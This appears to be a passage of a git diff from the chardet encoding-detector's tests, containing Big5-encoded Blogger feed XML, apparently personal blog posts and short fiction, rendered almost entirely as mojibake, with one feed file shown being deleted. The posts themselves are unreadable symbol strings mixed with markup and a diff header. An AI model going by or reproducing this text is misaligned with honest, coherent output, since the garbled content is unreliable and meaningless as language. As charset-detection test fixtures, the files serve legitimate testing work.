/>¥L¦₪v³£ֵ¥₪£ְ´×÷(₪s×Fִy­^₪ו¦ׁ®v]<br /><br />­n©R<br />¥L₪W½ׂ<br />§¥u¦³÷־ִ±×÷¥ק<br />¦]¬°§₪£¦‎ֵ¥₪£ְ´¥L»¡¦b»¡װ£<br />¥B¦]¬°¥L×÷₪W½ׂ¶i«׳₪Q₪ְ₪¨B<br />ֵ‎§¹ן­^₪ו§¹¥‏¥¢¥h¿³½ל­@₪<br /><br />¥i·Q¦׃×¾<br />§³o­׃₪@¶}©l´¼₪O₪ְ¯Z¦b²ִ₪@¬q¯Z×÷³ֳ¥כ<br />¨ל₪ֹ°ך₪G®ֹ<br />´N±¼¨ל²ִ₪G¬q¯Z<br />¥D­n­ל¦]´N¬O¹ן­^₪ו¦¼ֹ¦±ף<br />·Q¨׃´N¦n¯÷<br />·ם®ֹ¦~¥®µL×¾×÷§<br />³÷ֱµ¹¦₪v₪@­׃«a°ֳ°ף¬׃×÷²z¥ׁ<br />·Q»¡"§­ּ₪ֿ¦@¥²¦¨,«״°ך¥²³׃"<br />¨ל®ֹ₪₪₪ו´N¬O¥@¬ֹ³ּ±j¶ױ×÷»y₪ו<br />©ׂ¥H§¥u­n¾ַ¦n°ך₪ו<br />­^₪ו¦Aִך³£µL©ׂ¿׳<br />­.......¦°µֱo©ת×÷₪U³ץ<br />´N¬O₪@×½³B©ף¾ַ·~§C¯א×÷׬÷A₪U×½¨ל°×₪₪²¦·~<br /><br />µ¥¨ל½T»{­^₪ו¦A₪£¥־₪O¾ַ<br />₪H¥ֽ²z·Q´N­n¾ד­׃§¹³J®ֹ<br />§₪w¸g30·³₪F<br />°¾°¾¨÷®ֹ§₪H¦b₪׃₪@¼s§i₪W¯Z<br />₪י»y×÷ְ³¥־¦h¹L©ף­^₪ו×÷ְ³¥־<br />¦]¦¹§Y¨ֿ§§V₪O·Q§ה¦P¨ֶ₪@°_§ג­^₪ו·d¦n<br />«o¨S₪@­׃₪H»{¬°¦b₪י°׃¼s§i₪½¥q<br />§ג­^₪ו¾ַ¦n¦³װ£¥²­n<br /><br />©ף¬O<br />¹ן¾ַ­^₪ו₪Sֳi₪S®£ִ×÷₪÷A²׳©ף¥´±ׁ§₪F<br />¥i¬O<br />¨ל₪F¶ר¬¼s§i«ב<br />ֵ¥¨£¦P¨ֶ¶}₪f³¬₪f×÷³£¬v₪ו<br />ֵ‎§₪£¶ָ­n«ק₪F©R·Q¦n³׀·N<br />ֱµw©װ¥X®ֹ¶¡¥h₪W½ׂ<br />₪@¼ֻ¿ן¾¬ל¨£¬»y<br />¦‎<br />₪£¨ל¨ג­׃ֲ§«פ<br />´N¦]¬°₪u§@₪׃¦£₪S¥¢±ׁ₪F<br /><br />¦½ס₪J¶ר¬«ב¨ל²{¦b<br />§₪w¸g¦³₪K¦¸ֳ÷₪F¿ת₪W½ׂ₪£¨ל₪@¥b<br />´N¸¨¶]<br /><br />­^₪ו₪£¦n<br />¹ן±q¨ֶ¼s§i³׀·N×÷₪H¨׃»¡<br />ֱצ₪£¬O­P©R¦M¾ק<br />¦‎¦p×G´ק±זצ₪W÷²z¶¥¯ֵ<br />ֱ¬O­n±µ¨"­^₪ו"¦ֵׂח<br /><br />´N³o¼ֻ<br />§₪µ₪ׁ´N¨ל₪½¥q¹j¾ְ×÷¦a²y§ר¬₪י»y<br />×ב₪F¥|¸U₪»¶R₪F₪T¦~¥b×÷·|­¸ך®ז<br />´N¾a³o₪@¦¸₪F<br />§₪w¸g¸ױ¹L¦U÷״₪ט×k₪F<br />¦‎³£³Q§×÷ֳi´k©M¦°µֱo©תµ¹·´₪F<br />¥h¬ל¨£,¥h₪ו₪j×‏³]»y¨¥₪₪₪<br />¥h®v₪j§ה¦ׁ¥~®a±׀,¥hµ״÷¸µף,¥h®זִץ­^»y<br />³£¬O₪@¼ֻ×÷<br />¥b³~¦׃¼o<br /><br />¦‎³o¦¸<br />³o¦¸¬O×÷«₪£¦P₪F<br />¦]¬°§²´¸C¸C¬µ₪ֹµ¥¾ק·|₪@×½¿ש¥¢<br />¦‎ֱ¬O¦b¦n₪£®e±o¨ל₪F₪@¥ק¬¦₪£¿ש×÷ְY»־«ב<br />¨ּµM¦]¬°¨S¦³¦n×÷¥~»y¯א₪O<br />(₪י»y¦n,­^₪ו§ף¦n)<br />´Nµ¥©ף¨S¦³ִv×§₪O<br />¨÷ֱ·d§¾°<br />§₪w¸g¥¢¥h¦h¦¸₪ֲֹ¾¾ק·|©Mִ_¶Q®ֹ¥ת<br />³o¦¸¦A₪£¦n¦n¾ַ<br />§¬³o<br />´Nµ¥µ₪@½ת₪l³£×¦₪£₪W°×¶¥×÷¦ל₪l¦n₪F<br />₪T¦~¥b×÷¦a²y§ר¬₪י»y·|­¸ך®ז<br />ְH«K¦₪v·Q¥h₪W½ײ±׀×÷<br />©־­‏¶¥¬q×÷½ׂ<br />³£«ֵw×ן<br />§·Q<br /><br />§·Q₪@©w­nֲ\²ז"­^₪ו"³o­׃ֱֲֽp₪G₪Q¦~×÷´c¹<br />´N¾a§A₪F<br />KAFKA¥‎¥ֽ -false - - - - -KAFKA - -2005-12-29T17:12:00+08:00 -2005-12-30T02:35:20Z -2005-12-29T10:05:49Z - -tag:blogger.com,1999:blog-7754027.post-113585074938696342 -¬Y÷״¥ֱ±°¾°ץ -<img src="http://www.royalbcmuseum.bc.ca/hhistory/graphics/stone2s.jpg" alt=www.royalbcmuseum.bc.ca><br /><br />¦£₪F₪@­׃¦h₪כ<br />³sµ¥|©P×÷©P¥נ°²³£³Q·´±¼<br />¦‎²׳©ף¦³₪F¦nµ²×G<br />§­ּ¦A¦¸¾ײ¦³×F₪¸×÷¼s§i¥N²zֵv<br />©־³\(³Q¶ְ­Z¶¯´£¥X×÷©־³\)<br />§­ּ©ת¦~ֱ¥i¥H±µ×F₪¸¨ה¥¦°׃«~×÷¼s§i¥N²zֵv<br /><br />³o¦¸₪ס½Z§i±¶<br />₪£¥uֵ‎§­ּ³o²ױµyµy­°§C³Q¦X¨ײ©־¸ך»÷×÷<br />®£ִ<br />₪]ֵ‎§­ּ₪½¥q²׳©ף¦b°I₪F§ײ₪@¦~«ב<br />¦b₪ס½Z¥¢±ׁ₪Q¦¸«ב²׳©ףִ¹₪F₪@¦¸<br />ֵ‎§­ּ³o·s¨׃×÷ֱ`¸g²z¦³ֲI¦¨ֱZ<br />©ׂ¥H¨¯­W÷ג¬O¦³₪F¦^³ר<br /><br />¦‎₪£¯א§_»{×÷¬O<br />¥xֶW¼s§i·~´N¹³₪k¸ײ₪H»¡×÷<br />¼s§i·~×÷¥V₪ׁ¯u×÷¨׃₪F<br />«ָ₪ב÷¦~¦~­°§C¼s§i¹w÷ג<br />¼s§i₪½¥q₪]²£¥ֽ₪F¦AֲX₪j»P¦A₪p«¬×÷·¥÷µo®i<br />₪Z¸gְח¥~°׃×÷¥~°׃¼s§i₪½¥q×ּ<br />¹w÷ג₪£ֱY₪ֿ¼W<br />¦׃¸gְח¥»₪g©־₪י¨t×÷¥»₪g»P₪י¨t¼s§i₪½¥q<br />«h₪£¦‎¹w÷ג³Qְ£ֱ₪£ֲ_±¼«ָ₪ב<br />ֵ¦¨ֵ‎₪p¼s§i₪½¥q<br />¬ֶ¦´Cֵי¦p×F´ֻ¹qµר³£¨׃·m¹w÷ג<br /><br />©ׂ¥H¥i¥Hֲk¯ַ×÷»¡<br />¥xֶW²£·~₪£ֲ_¦ט¶i×÷ֱֽ¶ױ<br />ֵ‎¥»₪g»P₪י¨t¼s§i₪½¥q¶V¨׃¶V¨S¥ֽ·N¥i°µ<br />¦‎¥~°׃¼s§i₪½¥q«oְע±o§ף₪j×÷¹w÷ג<br />°µ¬°¦ט¶i×÷³sµ²»Pֲא¹B¯¸<br />½ֽ¥xֶW×÷¥~°׃¼s§i₪½¥q¥i¥H©ח¦b₪j³°¼½©ס<br />×÷¼s§i¼v₪ש<br />¥i¥Hֱָ¨תֳB¥~¦‏×ק<br />¦‎µL₪O¦ט¶i×÷₪י¨t©־¥»₪g₪½¥q<br />´N³s°µ¼s§i×÷¹w÷ג³£­nֱY₪פ<br />¥H·ַ³ֶ«e¶i₪₪°ך<br /><br />¬¨ל³o¼ֻ×÷·~¬ֹ²{¶H<br />¥u­n°µ¼s§i°ק₪[×÷₪H§·Qְ³¸׃³£·P¨¨ל<br />₪k¸ײ₪H»¡×÷¥V₪ׁ¦³¦hֳר¨₪F<br /><br />₪£§ט¬F×v<br />¥ת´N°׃·~¦ׂ¶q<br />½T¹ך¥xֶW¥ר·~³£₪£ִ@·N§ג»זµe¦b¥xֶW¸ּ<br />´X¥G¨C®a³£¦ט¶i₪F<br />¬F©²¾׳₪]¾׳₪£¦ם<br />¥xֶW×÷¥ר·~¸£³U¸ּ·Q×÷¥u¦³"ֵ₪j"ֵ₪j"¦Aֵ₪j"<br />­n¦¨¬°¥i¥H»P¥~°׃¬§¿ֵ×÷°ך»₪j¥ר·~<br />³o¬OµL¥i«p«D×÷<br />¦‎₪£ֵU¥xֶW©־ִכ¬¹¾i₪j¥L×÷¥xֶW<br />¹ך¦b¥s₪Hֳר¨<br />¬°₪F¶}×K´²¸­<br />¹חִ@ֲ_®₪]­n¨ל₪₪°ך¥ֽ®<br />₪£¸T¨ֿ₪H₪£±o₪£·P¹ִ<br />¥xֶW²¦³÷₪£¬O«nֱת₪]₪£¬O₪י¥»<br />¥u¬O₪@­׃³sֱp¦X°ך³£¶i₪£¥h×÷¸gְֵי<br />¦b¦¹°£₪F·P¹ִ<br />₪]µL¯א¬°₪O<br />¦]¬°³s§²{¦b¥´¥X×÷¦r<br />¶ַ¼½©ׂ¹B¥־·P±¡»P₪ו₪ֶ<br />³£¥X¦₪₪°ך<br />§¯א»¡₪°»ע<br /><br />¦n§a<br />§©׃»{<br />§·Q¦₪v¶}¼s§i₪½¥q<br />¨ֳ¥ׁ©ף¥»¨­­׃©»P₪½¥q³W¼ׂ<br />§·|¥u¦b¥xֶW°µ¼s§i<br /><br />.........«ח»ע©¿µMִ±±o<br />§²{¦b×÷₪÷A¦³ֲI¹³§₪G₪Q¦~«e×÷°¸¹³₪@¼ֻ<br />¦o»¡<br />¦o₪£·|ֲק¶}₪י¥»¨ל¥פ¦ף¦a₪ט¶}÷t°·|<br /><br />¶ג<br />©־³\¦o×÷÷tְֳ¨ֶ·~¥u¯א¨ל₪@©w³W¼ׂ<br />¸ע¦o³o­׃¥ֱ±©°¾°ץ¦³ֳצ<br />₪£¹L<br />§₪£₪¶·N<br />§¶}₪´N¦n<br />¦]¬°¬O"§"×÷¼s§i₪½¥q¹ְ -false - - - - -KAFKA - -2005-12-21T17:21:00+08:00 -2005-12-24T07:17:47Z -2005-12-21T09:25:04Z - -tag:blogger.com,1999:blog-7754027.post-113515710455415676 -₪£©ת©ׂ¥H -<img src="http://what-the-hell-is-hell.com/fire2.jpg" alt=what-the-hell-is-hell.com><br /><br />₪µ₪ׁ§¥H₪@­׃₪K¦~¥H₪W¼s§i¼¶₪ו¸g¾ת<br />±µ¨₪F₪@­׃¦³¦p³Q©I₪@₪´x×÷«¾ֹ<br /><br />§·Q·|¦³³o¼ֻ×÷¨ֶ±¡µo¥ֽ<br />ְ³¸׃¸ע§¨­³B¦b₪£©ת©ׂ¥H×÷¦s¦b׬÷A₪U¦³ֳצ<br /><br />·׃²z»¡§ְ³¸׃¦÷₪F<br /><br />¦‎¥ׁ©ף»ג®©₪@­׃¯u²z<br />¥H₪־¯א©M₪@¦ל­ָ±o°ם­s¥I¥X₪@¥ֽ×÷₪k₪l¦b₪@°_<br />©ׂ¥Hֵ‎§---·¥¬°₪÷¦b¦p₪×÷¡¨§¡¨¨M©wִ~ִע¬¡µ<br />¦׃¾ֹ­P±q¸׃¦÷×÷₪י₪l₪§«ב×÷¨C₪@₪ׁ<br />³£ֵ¦¨¬O¬¡¦b₪£©ת©ׂ¥H×÷¡¨­¯¥ֽ×÷¦t©z¥ֽ©R¾תµ{₪₪¡¨<br />»¡©ת¥ױֲI´N¬O<br />²{¦b§×÷¦s¦b<br />¬O§¹L¥h¦n´X¥@½°j¥H¨׃±q¥¼¸g¾ת¹L×÷<br />§²{¦b×÷¦s¦b<br />¬O¡¨§¡¨¦s¦b©ף¦t©z₪§¶¡©ׂ₪£´¿¦³¹L×÷¦s¦b<br />¨S¦³¹L¥h×÷¥ֽ©R¸gֵח¥i´`<br />₪]¨S¦³¥¼¨׃·|¥X²{×÷¥ֽ©R¸g¾ת¥i±´<br />´N³o¼ֻ§¹³×ל±q¶ֲ¬}¸ּ¬µ¥X¨׃×÷¬Pֵי<br />¨ל©³­n÷ג¬O²V¨Pֱ¬O§־¦¨₪]₪ְ₪£²M×÷´N¦b·ם₪U³o­׃®ֹ×ֵ¸ּ₪F<br /><br />§·Qְ³¸׃¬O¦]¬°³o¼ֻ<br />©ׂ¥H§₪§«e¼g×÷₪@½g¼s§i₪ו®׳³Q«ָ₪ב§_©w«ב<br />³÷µM·|»­nֵ‎₪@­׃¼¶₪ו¸gֵח¨S§¦h×÷₪H§i¶D§<br />«ָ₪ב§ֶ±ז¬¨£×÷¬O«ח¼ֻ×÷₪ו®׳<br /><br />­n§¶i₪J®ר¶O×ּ₪¸ּ¥@¬ֹ<br />¦׃¥B¬O¥H®ר¶O×ּ²£¥ֱֽ¶R°¾ק×÷¹ן¶H¬°¼g§@¹ן¶H<br />­n¼g¥X₪@­׃¥¥°×÷₪ֱn<br />¹ן¦o×÷baby»¡¸<br />(·םµM³o¸ּ­±¬O¥]§t¦³¡¨«ח»ע¹B¥־²£«~¡¨×÷´y¼g)<br /><br />±z¥i¥HֱA¸ׁ¶<br />§³Q«¾ֹ»¡<br />«ָ₪ב­n§¼g×÷₪ו®׳¬O<br />¡§¹³¡¨₪@­׃¥¥°¦b¹ן¦o«ִ₪l»¡¸×÷₪ו®׳<br />§¥²¶·§ג¦₪v·ם¥¥°<br />¼g¥X₪@½g¡¨¹ן¦₪v×÷baby»¡¸¡¨×÷₪ו®׳<br />µ¥©ף­n§¼g₪@½g¡¨¨p₪ו¾ַ¡¨₪ו®׳<br />ֵ‎¥״¼׀®ר¶O×ּ¬₪F·|·P°×÷₪ו³¹<br /><br />¬°₪°»ע©O<br />§ֱ`¬O³Q­n¨D­n¦¨¬°®ר¶O×ּ<br />¨ֳ¥B¼g¥X₪k©®ר¶O×ּ×÷₪ֱn<br /><br />¬°₪°»ע¦ׁ₪@½ת×÷<br />¥x¦¡×÷¼s§i₪Hֱ`¬O­n³o¼ֻ°µ¼s§i<br />½זµ¹¶‎¶‎×÷²£«~<br />´N­n¼g¥X³o¨ַ¶‎¶‎×÷₪ֱn<br />ֵ‎³o¨ַ¶‎¶‎ִ±±o³o¨ַ₪ו¦r<br />´N¹³¦o·|»¡·|·Q×÷₪@¼ֻ<br /><br />½זµ¹₪k₪H×÷²£«~<br />₪@©w­n¼g¦¨¬Yֳ‏«¬₪k₪H·|»¡×÷·|·Q×÷₪ו®׳<br />ֵ‎¦o­ִּ±±o¼s§i¼g¥X¦o­ּ₪₪₪©ׂ·Q©ׂ¨¥×÷<br />­n³]₪@­׃®״<br />ֵ‎¦o­ּ¸ץ¶i¥h¦§§כ®g¡K<br />¬O¥xֶW₪k₪H¬ׂ¦p¦¹¶<br />³ֵw¬¨£§O₪H±N¦o×÷₪ֱn»¡¥X¨׃<br />ֱ¬O³o¬O¦ׁ₪@½ת¥x¦¡¼s§i₪H¦¥H¬°¬O×÷¦³®ִ¼s§i<br /><br />₪]³\§a<br />§₪S¶}©l¼g₪]³\₪F<br /><br />¥u¬O₪µ₪ׁ§¬O¦b₪@­׃₪£©ת©ׂ¥H×÷¦s¦b׬÷A<br />©ׂ¥H₪~·|¦³³o¼ֻ₪£©ת©ׂ¥H×÷₪ֿ§₪S¥X²{¦׃₪w<br /><br />µM¦׃<br />₪@­׃<br />¾ק·|ְֶ¥ת³÷µM₪]¡¨₪£©ת©ׂ¥H¡¨×÷¥X²{₪F<br />©p»¡¡G´N·ם°µ¬O¦bְ°¦o­ּ¼g¥X<br />¦o­ּ¼g₪£¥X¨׃×÷₪ו³¹₪£´N¦n₪F<br />¨‏<br />¹ן°<br />§«ח»ע³£¨S·Q¨ל<br />§¦₪v¬OµL×k¹G¦₪v°µ¥פ¦ף¦₪v₪£ִ@·N°µ×÷¨ֶ×÷<br />¥B§O₪H<br />¯S§O¬O©ׂ¿׳×÷¦ׁ₪@½ת×÷­n¹G§°µ§₪£ִ@·N°µ×÷<br />§×÷₪ֿ§·|§ף₪j<br />¦‎¦p×G<br />¦p×G»¡³o¨ַ³£¬O¬°₪Fְ°§U§O₪H<br />ְ°₪£×¾¦p¦ף×ם¹F¦₪v±¡·P×÷®ר¶O×ּ<br />ְ°₪£×¾«ח»עֵ‎¦₪v×÷²£«~¾P°גµ¹¦³»­n×÷₪H­ּ<br />§´N·|«ִ@·N³ב<br /><br />¦]¬°³o¬O¦bְ°₪H°<br />¥i¥Hֵ‎§«¦¨p×÷¹F¦¨§­n×÷¥״×÷---ְ°§U§O₪H<br />¨÷§´N·|«ִ@·N³ב<br /><br />³ב~<br />§×÷¥¼±B©d<br />©p¯u×÷₪׃ֱo©ת₪F<br />©pֵ‎§¦h¦~×÷§©±o¨ל₪F³ּ¦n×÷±ֵֿ«<br />§¥i¥H±N©ׂ¦³₪£ִ@·N°µ×÷<br />ֲא₪ֶ¦¨¬O¬°₪Fְ°§U§O₪H¦׃°µ×÷<br />¨÷§´N·|ִ@·N₪F<br />³o¬O§₪@×½¦b°l¨D×÷¦s¦b·N¸q<br />¦p×G¬O¦]¬°§O₪H×÷»­n¦׃ֵ‎§¦s¦b<br />§´N·|ִ@·N₪F<br /><br />±z¥i¥HֱA¸ׁ¶<br />§₪׃¦¨p₪F<br />¥H­P©ף§»­n¦³₪@­׃°¶₪j²z·Q°×°×¦b₪W<br />ֵ‎§¦ש₪ג÷K¬P<br />₪~₪£­P÷¡₪ג¦ֳ×d<br />¬°₪F¦¨p×÷ְ°§U§O₪H¦׃°µ¦׃¦s¦b<br />§×÷¥ֽ©R₪~·|¦³·N¸q<br />¦n°×¿³°<br />³o­׃»ג®©³÷¬O¦]¬°₪£©ת©ׂ¥H¦׃¨׃×÷<br />²צ¦W <br />¦n´־×÷²צ¦W<br />«¢«¢«¢<br />¯u¬O₪׃°×¿³₪F<br />ֶg°ױ -false - -
    diff --git a/chardet/tests/Big5/ke207.blogspot.com.xml b/chardet/tests/Big5/ke207.blogspot.com.xml deleted file mode 100644 index 9fe1cc7..0000000 --- a/chardet/tests/Big5/ke207.blogspot.com.xml +++ /dev/null @@ -1,249 +0,0 @@ - - - - - - -block-k.207 -³o¸ּ¡A¥i÷ג¬O§×÷ְH·N×ֵ¶¡§a - -tag:blogger.com,1999:blog-8749901 -2005-12-30T19:53:54Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Ke - -2005-12-31T03:47:00+08:00 -2005-12-30T19:53:54Z -2005-12-30T19:51:07Z - -tag:blogger.com,1999:blog-8749901.post-113597226718364421 -©ס±ף§§a - -
    ¦₪v₪£¦A¬O¦₪v
    ₪£¦p§ג¦₪v©ס±ף
    -
    §. ¦A°µ₪£¦^¦₪v.
    -
    28122005 CB
    30122005 PE
    -
    -false -
    - - - -Ke - -2005-12-29T19:53:00+08:00 -2005-12-30T09:28:11Z -2005-12-29T12:16:27Z - -tag:blogger.com,1999:blog-8749901.post-113585858768849447 -³ - -
    "³?"
    -
    "³.. ¬O§A? «ח»ע₪F?"
    -
    "¨S₪°»ע. ´N¬O·Q°_§A´N¥´µ¹§A¹ְ~"
    -
    "§c.."
    -
    "..."
    -
    "§A­ט±q¾c©±¦^¨׃¶?"
    -
    "¹ן§r.. §A₪µ₪ׁ¨S¦³¨׃©ׂ¥H·Q°_§A«K¥´µ¹§A¹ְ.."
    -
    "§¨S»¡¹L·|¨C₪ׁ³£¨׃¥תֵU¹ְ.. ­n¬O¨C₪ׁ³£¨׃§₪£´N·|¯}²£₪F¶?"
    -
    "¨÷.. ₪£¥תֵU³£¥i¥H¨׃¬¬§¹ְ.."
    -
    "§c.. ½ײ»¡¹L·Q¬§A.."
    -
    ".. ¹ן₪F!"
    -
    "«ח»ע°ױ? ¨Sװ£¨ֶ×÷§±¾½u₪F.."
    -
    "§A.. ¦£µ¶?"
    -
    "₪£.. ֱ¥¿¶¢µ.. ¥u¬O¸ע§A₪£¬O¸ע§A₪׃.."
    -
    "¼פ"¦rֱ¨S»¡¥X₪f, ¨k¥ֽ´N..
    -
    "¥i¥H°§A₪@­׃°ֳD¶?"
    -
    "¶ג.."
    -
    "¬°₪°»ע¨C¦¸§A¨׃¾c©±³£¬O¿W­׃¨א×÷?"
    -
    "¨÷₪S«ח¼ֻ? ½ײ»¡¹L³}µף₪@©w­n¦³₪H§@¦ס?"
    -
    ".. ¨S¦³.. ¦‎§A₪£·|§ה×B₪ֽ³­¦ס¶?"
    -
    "§³ֵw₪@­׃₪H«K₪@­׃₪H, ³ֵw§ה×B₪ֽ´N§ה×B₪ֽ, ³£¥־₪£µ§A÷§a?"
    -
    "¨÷.."
    -
    "§A¦n·׀§r! ¨÷₪°»ע¨÷₪°»ע? ¦³₪°»ע­n°´N°§a!"
    -
    "§A¨S¦³¨k×B₪ֽ¶? «ח»ע₪£§ה¥L..?"
    -
    "°Q¹½! §O´£¨÷­׃₪H¦n₪£¦n?"
    -
    "«ח»ע°ױ.."
    -
    "¨S«ח»ע! ₪ְ₪ג₪F´N¬O₪ְ₪ג₪F! ₪£­n´£¨÷³ֳ¥כ§a!"
    -
    "³ב.. ¹ן₪£°_.."
    -
    "¨÷¦n₪F¶? ¨S¨ֶ´N±¾½u₪F. ´Nֲז!"
    -
    "dododo.."
    -
    ¨k¥ֽ×÷₪ג¾ק¼u¥X₪F³q¸®ֹ¶¡.
    -
    ֱצµM¦³ֲI¨א´o₪H×÷¹ן¸.
    -
    «oֵ‎¨k¥ֽ×¾¹D₪F­«­n×÷¨ֶ±¡..
    -
    -false -
    - - - -Ke - -2005-12-28T02:00:00+08:00 -2005-12-27T18:05:03Z -2005-12-27T18:00:14Z - -tag:blogger.com,1999:blog-8749901.post-113570641429437173 -¸ױ₪U -<a href='http://photos1.blogger.com/hello/53/2066/1024/mix.jpg'><img border='0' style='border:1px solid #000000; margin:2px' src='http://photos1.blogger.com/hello/53/2066/400/mix.jpg'></a><br />ֹA.. ±Nd¬ֱY²׃¥×©ס®I₪@°ן¯u«Y¦nט°¬[«§? µ¥§¸ױ₪U¥‎..&nbsp;<a href='http://picasa.google.com/blogger/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' border='0' style='border:0px;padding:0px;background:transparent;' align='absmiddle'></a> -false - - - - -Ke - -2005-12-27T19:21:00+08:00 -2005-12-27T12:43:03Z -2005-12-27T12:43:03Z - -tag:blogger.com,1999:blog-8749901.post-113568738328377413 -¨S₪H×¾¹D×÷·P±¡ - -
    ¨k¥ֽ¸ע₪k¥ֽ×÷×B₪ֽ°י₪£¦P,
    -
    ¨גֳה×÷×B₪ֽ­ֱּצµM»{ֳׁ, «o₪£¬O₪׃¼פ.
    -
    ֳר±o¦³·d₪ג¿ל°_¿N¯N»E·|, ¯A₪־¨ל´X­׃×B₪ֽ°י,
    -
    ₪]¥]¬A₪F¨k¥ֽ©M₪k¥ֽ×÷°י₪l.
    -
    ¬¡°²±₪j§a! ¾ד¹־₪H³עµ¿N¯Nִl,
    -
    ×±¼ײ, ¿N¯N, ½ֽ₪ׁ, ₪j¯÷.
    -
    ¿N¯N®ֹ¶¡µ²§פ, ₪j¹¨א¦µM¦a³ע¦b₪@°_×±¹Cְ¸.
    -
    ¹Cְ¸¬O - ¸¹ך©־₪jֱx.
    -
    ding ding.
    -
    "­n¬O°₪־¨÷¦^¨ֶ, ₪£­n§i¶D¥L­ּ¦n¶?" ¨k¥ֽ¦¬¨ל₪ג¾קµu°T.
    -
    tszzzzzzz.
    -
    "ok. ^^~" ₪k¥ֽ¦¬¨ל¦^ֲ׀.
    -
    ₪@¸s₪H»E¦b₪@°_, ¨÷¨ַ°ֳD, ֳר§K§a!
    -
    °₪־₪k¥ֽ₪F.
    -
    "¸¹ך©־₪jֱx?" ₪k₪ֽ₪H¥ׂ¥‎°.
    -
    "¥i¥H¥‎ֵ¥°ֳD¶?" ₪k¥ֽ.
    -
    "§O÷ֶ₪F. §ײ¿ן!" ₪ֽ₪H¥ׂ¦^µ×.
    -
    ".. ¨ה¹ך¥L¦³¨S¦³¨k×B₪ֽ×÷§r..?"
    -
    ₪ֽ₪H¥ׂ¥¿°½°½×÷°₪ֽ₪H₪A, «o¸Iµ₪@₪ש"¦÷×ֵ®נ",
    -
    ¥‏³ץ×÷₪H³£ֵ¥¨ל₪F.
    -
    "§A«°§´ק¶?" ₪ֽ₪H₪A.
    -
    "¨÷.. §¿ן'₪jֱx'§a.." ₪k¥ֽ¦^µ×₪F.
    -
    "¨÷.. ¿ן­׃¨k¥ֽ§k₪@₪U§a!" ₪ֽ₪H¥ׂ¿³¾ִ×÷´£ִ³µ.
    -
    ´£¨ל³o¨א, ¨k¥ֽ­ֱּ`·|°_«¡§a..
    -
    ¦‎₪k¥ֽ­ּ«o¦³ֲI·L¨¥.
    -
    "₪£¬O§a.. ¨÷°Z₪£¬Oֵ‎§A­ּ³o¨ַ¦ג¯Tֱָ₪F?" ₪k₪ֽ₪H¥ׂ»¡µ.
    -
    "³! ₪£­nֵ‎¥L­ּ±o.."
    -
    ₪k₪ֽ₪H₪Aֱ¨S»¡§¹. ¥u¬¨£₪k¥ֽ¯¸°_¨׃,
    -
    ¦V¨k¥ֽ×÷®B§k₪U.. ²`²`×÷.
    -
    ¨k¥ֽ×÷¥״¥ת§b₪F, ¨S¦³§גֲש²´¦X₪W.
    -
    "1.. 2.. 3.. 4.. 5...." ₪ֽ₪H₪A±זµ₪ג¿צ¼ֶµ.
    -
    ×½¨ל₪k¥ֽ¯¸°_.
    -
    "³o¼ֻ¥i¥H¶?" ₪k¥ֽ­±¦V¨k¥ֽ­ּ. ¥i·R×÷¼ֻ₪lֵS¥X¯÷®e.
    -
    "..³o.." ₪k₪ֽ₪H₪A §b₪F.
    -
    "§A÷ֶ₪F¶??" ₪k₪ֽ₪H¥ׂ°₪k¥ֽ.
    -
    "¨S¦³§r! ×±×±½}₪F! §¿ן₪F'₪jֱx'¹ְ.." ₪k¥ֽ¦^ְ³.
    -
    "§¨S»¡¹L¬O¼L®B§a.. ¨ה¹ך.. ֱy³£¥i¥H×÷.." ₪ֽ₪H¥ׂ»¡.
    -
    ¹Cְ¸ִ~ִע. ₪j®a¨ּµM¦a©_©ַµ­ט₪~µo¥ֽ×÷¨ֶ.
    -
    ×½¨ל. ©]²`.
    -
    ========================
    -
    ©]²`. ¬¡°§¹₪F. ¬O¨k¥ֽ­ּ"₪ְֵB"×÷®ֹ­װ.
    -
    ´N¬O₪ְְY°e₪k¥ֽ­ּ¦^®a×÷®ֹ­װ.
    -
    ¨k¥ֽ×׃°_°e₪k¥ֽ¦^®a×÷¥פ°ָ.
    -
    ²z©ׂ·םµM¦a¨«¶i₪F¦aֵK¨®´[.
    -
    "§A·d₪°»ע§r..?" ¨k¥ֽ÷N₪£µְY¸£×÷°₪k¥ֽ.
    -
    "µ¹§Aֵו³₪£¦n»ע?" ₪k¥ֽ¶ּ¶ּ×÷¯÷µ.
    -
    "§A₪£©ָ¥L­ּ.. ×¾¹D¨ַ₪°»ע¶?" ¨k¥ֽ°.
    -
    "₪£·|₪F.. ₪ֿ¥¿§₪@¦V³£¬O÷ֶ÷ֵֶצֵצ×÷¹ְ~" ₪k¥ֽµ×.
    -
    "¬O.. ¬O¶?"
    -
    "ֵו³¶??" ₪k¥ֽ®iֵSµ¿³¾ִ×÷¯÷®e.
    -
    "ֵו₪ס¸¦h§a.."
    -
    ₪k¥ֽ¸ֻ¥i·R×÷«ף¼L₪F. "­ף.."
    -
    "₪U₪@¯¸¬O.." ¼s¼½.
    -
    ₪k¥ֽ§ג­ל¥»´₪µ§₪ג×÷₪ג§ן¬°´₪µ¨k¥ֽ×÷₪גµֳ.
    -
    "₪U¨®§a!"
    -
    "³!! ³o¨א¬O.."
    -
    ´N³o¼ֻ.. ₪k¥ֽµw©װ₪F¨k¥ֽ₪U¨®.
    -
    -false -
    - - - -Ke - -2005-12-27T17:42:00+08:00 -2005-12-27T11:18:17Z -2005-12-27T09:42:20Z - -tag:blogger.com,1999:blog-8749901.post-113567654095732973 -¦^¨ל§­ּ¬ֳׁ«e -<a href='http://photos1.blogger.com/hello/53/2066/1024/IMGP7661corr.jpg'><img border='0' style='border:1px solid #000000; margin:2px' src='http://photos1.blogger.com/hello/53/2066/400/IMGP7661corr.jpg'></a><br />¦^·Q, ¦^¨ל§­ֱּ¥¼»{ֳׁ×÷®ֹ­װ..<br /><br />₪₪¥|, ¬O§»{ֳׁ³ּ¦h₪H×÷₪@¦~, ¨­ֳה«¦h×÷¦n₪ֽ, ×¾₪v, ³£¬O¦b¨÷₪@¦~»{ֳׁ×÷, ₪]³\¬O₪ְ₪F₪ו²z, ₪]³\¬O¯B°, ₪S©־×ּ¬O¾ַ·|×÷ֳצ«Y, ¾ַ®ױ¸ּ±µִ²₪H×÷¾ק·|¦h₪F, »{ֳׁ×÷₪H¦µM¦h₪F. ¨÷»ע, ֵ‎§¦^§­ּ¥¼»{ֳׁ×÷®ֹ­װ§a! ¨÷­׃®ֹ­װ×÷₪j®a, ¨ל©³¬O«ח»ע¼ֻ×÷? §¦^¨ל₪F, ₪₪₪Toutward 